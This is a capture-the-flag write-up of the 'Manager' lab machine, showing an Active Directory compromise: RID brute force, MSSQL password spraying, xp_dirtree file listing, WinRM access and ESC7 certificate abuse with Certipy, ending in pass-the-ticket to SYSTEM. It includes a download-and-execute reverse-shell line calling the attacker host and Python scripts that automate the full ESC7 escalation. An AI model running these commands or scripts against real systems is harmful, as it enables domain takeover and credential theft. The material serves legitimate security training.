
Week 4. Manager
TL;DR
This is a Windows Server 2019 machine configured as a domain controller that also runs a Microsoft SQL Server 2019 instance. Using the guest session that SMB accepts, we can brute-force RIDs to obtain the list of domain users, then spray those usernames as passwords against MSSQL. In the database, the xp_dirtree
stored procedure is used to locate a backup of the website in the web root that contains credentials for a WinRM shell. For escalation, a misconfiguration of the CA's Manage CA permission (ESC7) is abused with Certipy to get a certificate issued for the administrator user and obtain a TGT from it.
KEYWORDS
RID brute force, MSSQL file system enumeration, xp_dirtree, ManageCA (ESC7), certipy-ad, pass the certificate, pass the ticket.
REFERENCES
https://www.thehacker.recipes/a-d/movement/kerberos/pass-the-certificate
ENUMERATION
Port scan.
> nmap $target -p- -T4 -Pn --open --reason
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-21 16:51 EDT
Nmap scan report for manager.htb (10.129.142.151)
Host is up, received user-set (0.32s latency).
Not shown: 65515 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
53/tcp open domain syn-ack
80/tcp open http syn-ack
88/tcp open kerberos-sec syn-ack
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
389/tcp open ldap syn-ack
445/tcp open microsoft-ds syn-ack
464/tcp open kpasswd5 syn-ack
593/tcp open http-rpc-epmap syn-ack
636/tcp open ldapssl syn-ack
1433/tcp open ms-sql-s syn-ack
3268/tcp open ldap syn-ack
5985/tcp open wsman syn-ack
9389/tcp open adws syn-ack
49667/tcp open unknown syn-ack
49677/tcp open unknown syn-ack
49678/tcp open unknown syn-ack
49679/tcp open unknown syn-ack
50489/tcp open unknown syn-ack
50568/tcp open unknown syn-ack
65495/tcp open unknown syn-ack
Nmap done: 1 IP address (1 host up) scanned in 1379.15 seconds
Run version detection and the default scripts against the open ports.
> nmap $target -p53,80,88,135,139,389,445,464,593,636,1433,3268,5985,9389 -sV -sC -Pn
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-21 17:29 EDT
Nmap scan report for manager.htb (10.129.142.151)
Host is up (0.13s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Manager
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-10-22 04:33:21Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-10-22T04:34:13+00:00; +7h03m31s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-10-22T04:34:12+00:00; +7h03m30s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-10-20T17:45:32
|_Not valid after: 2053-10-20T17:45:32
|_ssl-date: 2023-10-22T04:34:13+00:00; +7h03m31s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
|_ssl-date: 2023-10-22T04:34:13+00:00; +7h03m31s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 7h03m30s, deviation: 1s, median: 7h03m30s
| smb2-time:
| date: 2023-10-22T04:33:32
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
Nmap done: 1 IP address (1 host up) scanned in 55.72 seconds
SMB enumeration.
> smbmap -H $target -u guest
[+] IP: 10.129.142.151:445 Name: manager.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
SYSVOL NO ACCESS Logon server share
The server accepts a guest session over SMB; however, the only readable share is IPC$, so there are no files to pull.
USER
The guest session on IPC$ is enough to look up SIDs over LSARPC, so try an RID brute force to enumerate domain principals.
> crackmapexec smb manager.htb -u guest -p '' --rid-brute
SMB 10.129.142.151 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.129.142.151 445 DC01 [+] manager.htb\guest:
SMB 10.129.142.151 445 DC01 [+] Brute forcing RIDs
SMB 10.129.142.151 445 DC01 498: MANAGER\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.142.151 445 DC01 500: MANAGER\Administrator (SidTypeUser)
SMB 10.129.142.151 445 DC01 501: MANAGER\Guest (SidTypeUser)
SMB 10.129.142.151 445 DC01 502: MANAGER\krbtgt (SidTypeUser)
SMB 10.129.142.151 445 DC01 512: MANAGER\Domain Admins (SidTypeGroup)
SMB 10.129.142.151 445 DC01 513: MANAGER\Domain Users (SidTypeGroup)
SMB 10.129.142.151 445 DC01 514: MANAGER\Domain Guests (SidTypeGroup)
SMB 10.129.142.151 445 DC01 515: MANAGER\Domain Computers (SidTypeGroup)
SMB 10.129.142.151 445 DC01 516: MANAGER\Domain Controllers (SidTypeGroup)
SMB 10.129.142.151 445 DC01 517: MANAGER\Cert Publishers (SidTypeAlias)
SMB 10.129.142.151 445 DC01 518: MANAGER\Schema Admins (SidTypeGroup)
SMB 10.129.142.151 445 DC01 519: MANAGER\Enterprise Admins (SidTypeGroup)
SMB 10.129.142.151 445 DC01 520: MANAGER\Group Policy Creator Owners (SidTypeGroup)
SMB 10.129.142.151 445 DC01 521: MANAGER\Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.142.151 445 DC01 522: MANAGER\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.129.142.151 445 DC01 525: MANAGER\Protected Users (SidTypeGroup)
SMB 10.129.142.151 445 DC01 526: MANAGER\Key Admins (SidTypeGroup)
SMB 10.129.142.151 445 DC01 527: MANAGER\Enterprise Key Admins (SidTypeGroup)
SMB 10.129.142.151 445 DC01 553: MANAGER\RAS and IAS Servers (SidTypeAlias)
SMB 10.129.142.151 445 DC01 571: MANAGER\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.129.142.151 445 DC01 572: MANAGER\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.129.142.151 445 DC01 1000: MANAGER\DC01$ (SidTypeUser)
SMB 10.129.142.151 445 DC01 1101: MANAGER\DnsAdmins (SidTypeAlias)
SMB 10.129.142.151 445 DC01 1102: MANAGER\DnsUpdateProxy (SidTypeGroup)
SMB 10.129.142.151 445 DC01 1103: MANAGER\SQLServer2005SQLBrowserUser$DC01 (SidTypeAlias)
SMB 10.129.142.151 445 DC01 1113: MANAGER\Zhong (SidTypeUser)
SMB 10.129.142.151 445 DC01 1114: MANAGER\Cheng (SidTypeUser)
SMB 10.129.142.151 445 DC01 1115: MANAGER\Ryan (SidTypeUser)
SMB 10.129.142.151 445 DC01 1116: MANAGER\Raven (SidTypeUser)
SMB 10.129.142.151 445 DC01 1117: MANAGER\JinWoo (SidTypeUser)
SMB 10.129.142.151 445 DC01 1118: MANAGER\ChinHae (SidTypeUser)
SMB 10.129.142.151 445 DC01 1119: MANAGER\Operator (SidTypeUser)
Copy the lines of the domain users found to a file called output
and derive a wordlist of lowercase usernames from it.
> echo "SMB 10.129.142.151 445 DC01 1113: MANAGER\Zhong (SidTypeUser)
SMB 10.129.142.151 445 DC01 1114: MANAGER\Cheng (SidTypeUser)
SMB 10.129.142.151 445 DC01 1115: MANAGER\Ryan (SidTypeUser)
SMB 10.129.142.151 445 DC01 1116: MANAGER\Raven (SidTypeUser)
SMB 10.129.142.151 445 DC01 1117: MANAGER\JinWoo (SidTypeUser)
SMB 10.129.142.151 445 DC01 1118: MANAGER\ChinHae (SidTypeUser)
SMB 10.129.142.151 445 DC01 1119: MANAGER\Operator (SidTypeUser)" > output
> cat output | cut -d '\' -f 2 | awk '{print $1}' | tr '[:upper:]' '[:lower:]' > wordlist
> cat wordlist
zhong
cheng
ryan
raven
jinwoo
chinhae
operator
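An added example (not part of the original write-up) that does the same extraction in Python and adds the filtering a practitioner wants before spraying: keep only SidTypeUser entries, drop machine accounts (trailing $) and, by default, the well-known RIDs below 1000. The input is a constructed copy of a subset of the crackmapexec lines above, with two built-in principals and the machine account included on purpose so the filter has something to drop; the function names are this example's own.

```python
import re

# Constructed sample: a copy of crackmapexec --rid-brute lines from above,
# deliberately including RID 500, a group and the machine account.
RID_BRUTE_OUTPUT = """\
SMB 10.129.142.151 445 DC01 500: MANAGER\\Administrator (SidTypeUser)
SMB 10.129.142.151 445 DC01 513: MANAGER\\Domain Users (SidTypeGroup)
SMB 10.129.142.151 445 DC01 1000: MANAGER\\DC01$ (SidTypeUser)
SMB 10.129.142.151 445 DC01 1113: MANAGER\\Zhong (SidTypeUser)
SMB 10.129.142.151 445 DC01 1114: MANAGER\\Cheng (SidTypeUser)
SMB 10.129.142.151 445 DC01 1115: MANAGER\\Ryan (SidTypeUser)
SMB 10.129.142.151 445 DC01 1116: MANAGER\\Raven (SidTypeUser)
SMB 10.129.142.151 445 DC01 1117: MANAGER\\JinWoo (SidTypeUser)
SMB 10.129.142.151 445 DC01 1118: MANAGER\\ChinHae (SidTypeUser)
SMB 10.129.142.151 445 DC01 1119: MANAGER\\Operator (SidTypeUser)
"""

# One --rid-brute line ends with "<rid>: <DOMAIN>\<name> (<SidType...>)".
LINE_RE = re.compile(
    r"(?P<rid>\d+):\s+(?P<domain>[^\\]+)\\(?P<name>.+?)\s+\((?P<kind>SidType\w+)\)\s*$"
)


def parse_rid_brute(text):
    """Return (rid, domain, name, kind) for every line that parses."""
    out = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            out.append((int(m["rid"]), m["domain"], m["name"], m["kind"]))
    return out


def spray_candidates(text, min_rid=1000, keep_builtin=False):
    """Lowercase names worth spraying: SidTypeUser only, no machine accounts
    and, unless keep_builtin is set, no well-known RIDs below min_rid."""
    names = []
    for rid, _domain, name, kind in parse_rid_brute(text):
        if kind != "SidTypeUser" or name.endswith("$"):
            continue
        if rid < min_rid and not keep_builtin:
            continue
        names.append(name.lower())
    return names


if __name__ == "__main__":
    # Same shape as the wordlist above; feed it to crackmapexec -u/-p.
    for name in spray_candidates(RID_BRUTE_OUTPUT):
        print(name)
```

Built-in accounts are excluded by default because spraying Administrator is what trips lockout policies; pass keep_builtin=True if the engagement allows it.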
Next, spray the user list against MSSQL using each name as both username and password (crackmapexec tries every combination of the two files, so a password reused across accounts is caught too).
> crackmapexec mssql manager.htb -u ./wordlist -p ./wordlist
The attack succeeds for the credentials operator:operator.
Log in with credentials and start enumerating the database.
> python3 /usr/share/doc/python3-impacket/examples/mssqlclient.py manager.htb/operator:operator@10.129.142.151 -windows-auth
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
> SQL> help
lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
! {cmd} - executes a local shell cmd
> SQL> enable_xp_cmdshell
[-] ERROR(DC01\SQLEXPRESS): Line 105: User does not have permission to perform this action.
[-] ERROR(DC01\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
[-] ERROR(DC01\SQLEXPRESS): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
[-] ERROR(DC01\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
It seems xp_cmdshell
is not enabled and we lack the permission to enable it (RECONFIGURE is denied), so that path is closed. The next option is to force the SQL Server service to authenticate to a share we control, by pointing xp_dirtree
at a UNC path on the attacker host, and capture the NetNTLMv2 response with responder
or impacket's smbserver.py
. The captured response is:
[*] DC01$::MANAGER:aaaaaaaaaaaaaaaa:d063ef67f8a1adf0d8368e4438f744db:0101000000000000809a7d8dbd04da01a9e4c3054b7505c100000000010010004200470051006400540074006800640003001000420047005100640054007400680064000200100050005a005800780059005600670041000400100050005a0058007800590056006700410007000800809a7d8dbd04da0106000400020000000800300030000000000000000000000000300000489aaa814b1c641c0613cb01649cab0b0c5aadd6d67823781f76634d0d773dec0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00360039000000000000000000
Cracking it is not realistic: DC01$ is the domain controller's machine account, whose password is long and random, so hashcat will not recover it. Relaying it to SMB is not an option either, because the scan showed that message signing is required on the DC.
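As an added example that is not part of the original write-up, the following Python parses the captured response line into its fields and decodes the AV pairs at the end of the NTLMv2 blob. That tells you who authenticated, which service name the client was asked to reach (cifs/<attacker IP>, from MsvAvTargetName) and whether the account is a machine account, which is what decides whether cracking is worth attempting. The CAPTURED string is the same response shown above, split into pieces only for readability; the function names are this example's own.

```python
import struct
from datetime import datetime, timedelta, timezone

# Constructed copy of the response line captured above (the "[*] " prefix
# dropped); split into string pieces only for readability.
CAPTURED = (
    "DC01$::MANAGER:aaaaaaaaaaaaaaaa:d063ef67f8a1adf0d8368e4438f744db:"
    "0101000000000000809a7d8dbd04da01a9e4c3054b7505c100000000"
    "0100100042004700510064005400740068006400"
    "0300100042004700510064005400740068006400"
    "0200100050005a00580078005900560067004100"
    "0400100050005a00580078005900560067004100"
    "07000800809a7d8dbd04da01"
    "0600040002000000"
    "0800300030000000000000000000000000300000489aaa814b1c641c0613cb01649cab0b"
    "0c5aadd6d67823781f76634d0d773dec"
    "0a00100000000000000000000000000000000000"
    "0900200063006900660073002f00310030002e00310030002e00310034002e0036003900"
    "0000000000000000"
)

# AvId values from MS-NLMP 2.2.2.1; the ones in UNICODE_AVS are UTF-16LE strings.
AV_NAMES = {
    0: "MsvAvEOL", 1: "MsvAvNbComputerName", 2: "MsvAvNbDomainName",
    3: "MsvAvDnsComputerName", 4: "MsvAvDnsDomainName", 5: "MsvAvDnsTreeName",
    6: "MsvAvFlags", 7: "MsvAvTimestamp", 8: "MsvAvSingleHost",
    9: "MsvAvTargetName", 10: "MsvAvChannelBindings",
}
UNICODE_AVS = {1, 2, 3, 4, 5, 9}


def filetime_to_datetime(ft):
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC) to datetime."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ft // 10)


def parse_av_pairs(data):
    """Decode the AV_PAIR list that ends the NTLMv2 blob: (AvId, AvLen, Value)
    little-endian records terminated by MsvAvEOL."""
    pairs, off = {}, 0
    while off + 4 <= len(data):
        av_id, av_len = struct.unpack_from("<HH", data, off)
        off += 4
        if av_id == 0:  # MsvAvEOL terminates the list
            break
        value = data[off:off + av_len]
        off += av_len
        name = AV_NAMES.get(av_id, "MsvAvUnknown_%d" % av_id)
        pairs[name] = value.decode("utf-16-le") if av_id in UNICODE_AVS else value.hex()
    return pairs


def parse_netntlmv2(line):
    """Split a Responder/smbserver.py line user::domain:challenge:NTProofStr:blob
    and decode the NTLMv2_CLIENT_CHALLENGE blob (MS-NLMP 2.2.2.7)."""
    user, _, domain, server_chal, nt_proof, blob_hex = line.strip().split(":", 5)
    blob = bytes.fromhex(blob_hex)
    if blob[0:2] != b"\x01\x01":
        raise ValueError("not an NTLMv2_CLIENT_CHALLENGE blob")
    ft = struct.unpack_from("<Q", blob, 8)[0]       # bytes 8..15: timestamp
    return {
        "user": user, "domain": domain,
        "machine_account": user.endswith("$"),
        "server_challenge": server_chal, "nt_proof": nt_proof,
        "timestamp": filetime_to_datetime(ft),
        "client_challenge": blob[16:24].hex(),      # bytes 16..23
        "av_pairs": parse_av_pairs(blob[28:]),      # AV pairs start at byte 28
    }


def worth_cracking(parsed):
    """Machine accounts ($) carry long random passwords: skip them."""
    return not parsed["machine_account"]


if __name__ == "__main__":
    r = parse_netntlmv2(CAPTURED)
    print(r["user"], r["domain"], r["timestamp"].isoformat())
    for k, v in r["av_pairs"].items():
        print("  %-22s %s" % (k, v))
    print("worth cracking:", worth_cracking(r))
```

The MsvAvTargetName pair is the SPN the client believed it was talking to, which is why the hash blob carries cifs/10.10.14.69 (the attacker's share) rather than anything on the DC.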
Since xp_dirtree
at least lets us list the file system with the rights of the SQL Server service account, let's list the contents of the IIS web root.
> SQL> exec xp_dirtree 'c:\inetpub',1,1
subdirectory depth file
----------------------------------------------- --------------------- ----------- -----------
custerr 1 0
history 1 0
logs 1 0
temp 1 0
wwwroot 1 0
> SQL> exec xp_dirtree 'c:\inetpub\wwwroot',1,1
subdirectory depth file
---------------------------------------------------------------------- ----------- -----------
about.html 1 1
contact.html 1 1
css 1 0
images 1 0
index.html 1 1
js 1 0
service.html 1 1
web.config 1 1
website-backup-27-07-23-old.zip 1 1
It seems someone made a backup of the site in July and left a copy in the web root. Since IIS serves that folder on port 80, the file can be downloaded with a browser or wget
> wget http://manager.htb/website-backup-27-07-23-old.zip -O backup.zip
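An added Python example (not from the original write-up) that generalizes the two manual xp_dirtree calls above into a breadth-first walk of the file system, one stored-procedure call per directory, flagging names that look like backups or configuration files. The FAKE_FS table is a constructed stand-in for the SQL session built from the two listings above (the css, images and js folders are left empty); against a live server you replace fake_query with a callable that runs the statement over your MSSQL connection and returns rows as dicts keyed by column name, the shape impacket's MSSQL.sql_query returns. Function names and the pattern list are this example's own.

```python
import fnmatch
import re
from collections import deque

# Constructed stand-in for the server: rows xp_dirtree 'path',1,1 returned
# above, keyed by lowercase directory path.
FAKE_FS = {
    "c:\\inetpub": [("custerr", 1, 0), ("history", 1, 0), ("logs", 1, 0),
                    ("temp", 1, 0), ("wwwroot", 1, 0)],
    "c:\\inetpub\\wwwroot": [("about.html", 1, 1), ("contact.html", 1, 1),
                             ("css", 1, 0), ("images", 1, 0), ("index.html", 1, 1),
                             ("js", 1, 0), ("service.html", 1, 1), ("web.config", 1, 1),
                             ("website-backup-27-07-23-old.zip", 1, 1)],
}

PATH_RE = re.compile(r"xp_dirtree\s+'([^']*)'", re.IGNORECASE)


def fake_query(sql):
    """Pretend to execute the statement and return rows as dicts keyed by the
    column names xp_dirtree uses: subdirectory, depth, file."""
    m = PATH_RE.search(sql)
    path = m.group(1).rstrip("\\").lower() if m else ""
    return [{"subdirectory": n, "depth": d, "file": f} for n, d, f in FAKE_FS.get(path, [])]


def xp_dirtree_query(path):
    """depth=1 (one level only) and file=1 (include files, not just folders)."""
    return "EXEC master..xp_dirtree '%s',1,1" % path.replace("'", "''")


def walk_xp_dirtree(query, root, max_depth=4,
                    patterns=("*.zip", "*.bak", "*backup*", "*.config", "*.xml")):
    """Breadth-first listing below root. Returns (files, dirs, hits): all file
    paths, all directory paths, and the files whose basename matches a pattern."""
    root = root.rstrip("\\")
    queue = deque([(root, 0)])
    files, dirs = [], []
    while queue:
        path, depth = queue.popleft()
        for row in query(xp_dirtree_query(path)):
            full = path + "\\" + row["subdirectory"]
            if int(row["file"]) == 1:
                files.append(full)
            else:
                dirs.append(full)
                if depth + 1 < max_depth:   # bound the number of round trips
                    queue.append((full, depth + 1))
    hits = [f for f in files
            if any(fnmatch.fnmatch(f.rsplit("\\", 1)[-1].lower(), p) for p in patterns)]
    return files, dirs, hits


if __name__ == "__main__":
    files, dirs, hits = walk_xp_dirtree(fake_query, "c:\\inetpub")
    print("%d dirs, %d files" % (len(dirs), len(files)))
    for h in hits:
        print("interesting:", h)
```

Keep max_depth small on a real target: every directory costs one query, and a wide tree such as C:\Windows turns into thousands of them.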
Inside the .zip
file we find an .xml
file containing credentials for the user raven.
We use them to log in with evil-winrm (WinRM on port 5985 was open in the scan)
> evil-winrm -u raven -p 'R4v3nBe5tD3veloP3r!123' -i 10.129.142.151
This shell allows us to collect the user flag.
SYSTEM
First, upgrade to a more comfortable reverse shell with nishang's Invoke-PowerShellTcp, served from the attacker host.
> powershell "iex(new-object net.webclient).downloadstring('http://10.10.14.69/Invoke-PowerShellTcp.ps1')"
Next, enumerate the system.
> get-computerinfo
WindowsBuildLabEx : 17763.1.amd64fre.rs5_release.180914-1434
WindowsCurrentVersion : 6.3
WindowsProductName : Windows Server 2019 Standard
WindowsVersion : 1809
Enumerate the AD CS configuration and the CA's access rights with certify.exe (output not reproduced here).
It shows that the user raven
holds the ManageCA right on manager-DC01-CA, which is the ESC7 scenario. A walkthrough for abusing this misconfiguration can be found here: https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation#attack-2
The first step is to grant ourselves the Manage Certificates access right: ManageCA allows adding a new certificate officer to the CA, so we add our own user with the certipy-ad
tool.
> /usr/bin/certipy-ad ca -ca 'manager-DC01-CA' -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.129.142.151 -add-officer raven
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Successfully added officer 'Raven' on 'manager-DC01-CA'
If the SubCA template is not published on the CA, ManageCA also allows enabling it with the -enable-template
flag. By default the SubCA template is already enabled, so this step is usually a no-op.
> /usr/bin/certipy-ad ca -ca 'manager-DC01-CA' -enable-template SubCA -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Successfully enabled 'SubCA' on 'manager-DC01-CA'
Now we request a certificate based on the SubCA template, with the administrator's UPN as the subject alternative name. The request is denied because raven is not allowed to enroll in SubCA, but certipy saves the private key and prints the request ID; both are needed in the next steps. Make sure you run the command from a directory where you have write permission, otherwise the .key
file will not be written.
> /usr/bin/certipy-ad req -ca 'manager-DC01-CA' -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -target manager.htb -template SubCA -upn administrator@manager.htb
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 21
Would you like to save the private key? (y/N) y
[*] Saved private key to 21.key
[-] Failed to request certificate
Because we are now a certificate officer (Manage Certificates), we can approve the denied request with the ca command and the -issue-request <request ID> parameter.
> /usr/bin/certipy-ad ca -ca 'manager-DC01-CA' -issue-request 21 -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
[*] Successfully issued certificate
The private key was saved as 21.key
. Next, retrieve the issued certificate with the req
command and the -retrieve <request ID>
flag; certipy picks up 21.key from the working directory and writes certificate and key together to administrator.pfx.
> /usr/bin/certipy-ad req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -target manager.htb -retrieve 21
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Rerieving certificate with ID 21
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'administrator@manager.htb'
[*] Certificate has no object SID
[*] Loaded private key from '21.key'
[*] Saved certificate and private key to 'administrator.pfx'
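As an added example (not the page's own tooling), the whole ESC7 chain above scripted in Python around certipy-ad: it runs the same five commands, answers the "save the private key" prompt, parses the request ID out of the denied request and feeds it to the issue and retrieve steps, then authenticates with the resulting PFX. The constants are the values used above; the function names, and the assumption that certipy accepts "y" on stdin for that prompt, are this example's own.

```python
import re
import subprocess

# Assumed values, copied from the commands above; adjust for another target.
CA = "manager-DC01-CA"
USER, PASSWORD = "raven@manager.htb", "R4v3nBe5tD3veloP3r!123"
TARGET, DC_IP = "manager.htb", "10.129.142.151"
OFFICER = "raven"
UPN = "administrator@manager.htb"

# certipy prints "[*] Request ID is 21" even when the request is denied.
REQUEST_ID_RE = re.compile(r"Request ID is (\d+)")


def parse_request_id(output):
    m = REQUEST_ID_RE.search(output)
    if not m:
        raise RuntimeError("no request ID in certipy output")
    return int(m.group(1))


def certipy(*args):
    """argv for one certipy-ad invocation with the shared credentials."""
    return ["certipy-ad", *args, "-username", USER, "-password", PASSWORD]


def esc7_plan(request_id=None):
    """Ordered certipy invocations. The issue and retrieve steps need the
    request ID produced by the denied request, so they appear only once it
    is known."""
    steps = [
        certipy("ca", "-ca", CA, "-add-officer", OFFICER, "-dc-ip", DC_IP),
        certipy("ca", "-ca", CA, "-enable-template", "SubCA"),
        certipy("req", "-ca", CA, "-target", TARGET, "-template", "SubCA", "-upn", UPN),
    ]
    if request_id is not None:
        steps += [
            certipy("ca", "-ca", CA, "-issue-request", str(request_id)),
            certipy("req", "-ca", CA, "-target", TARGET, "-retrieve", str(request_id)),
        ]
    return steps


def run(argv, stdin=None):
    """Run one step, echo its output and return it for parsing."""
    p = subprocess.run(argv, input=stdin, capture_output=True, text=True)
    print(p.stdout, p.stderr)
    return p.stdout + p.stderr


def main():
    add_officer, enable_template, request = esc7_plan()
    run(add_officer)
    run(enable_template)
    # Assumption: answering "y" on stdin to "Would you like to save the private
    # key? (y/N)" keeps <id>.key, which the retrieve step later picks up.
    request_id = parse_request_id(run(request, stdin="y\n"))
    for step in esc7_plan(request_id)[3:]:
        run(step)
    run(["certipy-ad", "auth", "-pfx", "administrator.pfx", "-dc-ip", DC_IP,
         "-username", "administrator", "-domain", "manager.htb"])


if __name__ == "__main__":
    main()
```

Run it from a directory you can write to, for the same reason given above for the .key file, and with the clock already synchronized, since the final auth step is Kerberos.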
Note the line "Certificate has no object SID": the certificate lacks the SID security extension that patched CAs add, so a DC enforcing strong certificate mapping (KB5014754) would reject it; this DC still maps it by UPN. We can use the certificate to obtain a TGT through PKINIT with certipy-ad
. This is known as a pass-the-certificate attack (https://www.thehacker.recipes/a-d/movement/kerberos/pass-the-certificate).
Kerberos tolerates only a few minutes of clock skew (five by default), and the scan showed our clock about seven hours off from the DC, so synchronize it first with ntpdate
> sudo ntpdate -u 10.129.142.151
2023-10-22 16:28:37.84492 (-0400) +25184.364655 +/- 0.061746 10.129.142.151 s1 no-leap
CLOCK: time stepped by 25184.364655
Now, using the administrator certificate that we have just created, we generate a Kerberos TGT ticket.
> /usr/bin/certipy-ad auth -pfx ./administrator.pfx -dc-ip 10.129.142.151 -username administrator -domain manager.htb
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef
At this point we can get a fully interactive SYSTEM shell either by passing the administrator NT hash or by passing the TGT.
To pass the hash, use psexec.py
(or a similar tool) with its -hashes option. To pass the ticket, first export the credential cache so Impacket picks it up.
> export KRB5CCNAME=administrator.ccache
Then log in to the DC with the TGT (-k -no-pass makes psexec use the Kerberos cache instead of a password).
> python3 /usr/share/doc/python3-impacket/examples/psexec.py manager.htb/administrator@dc01 -k -no-pass -dc-ip 10.129.142.151 -target-ip 10.129.142.151
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 10.129.142.151.....
[*] Found writable share ADMIN$
[*] Uploading file pxXDoAzA.exe
[*] Opening SVCManager on 10.129.142.151.....
[*] Creating service CRFB on 10.129.142.151.....
[*] Starting service CRFB.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.4974]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> cd c:\users\administrator\desktop
c:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 566E-8ECA
Directory of c:\Users\Administrator\Desktop
09/28/2023 02:27 PM <DIR> .
09/28/2023 02:27 PM <DIR> ..
10/20/2023 10:46 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 2,414,751,744 bytes free
Final note: the clock tends to go back out of sync shortly after ntpdate
(most likely the attacking machine's own time service correcting the step), so run the commands that follow ntpdate promptly; have them typed elsewhere ready to paste. Alternatively, leave the system clock alone and run the Kerberos steps under faketime with the offset nmap reported in its clock-skew output.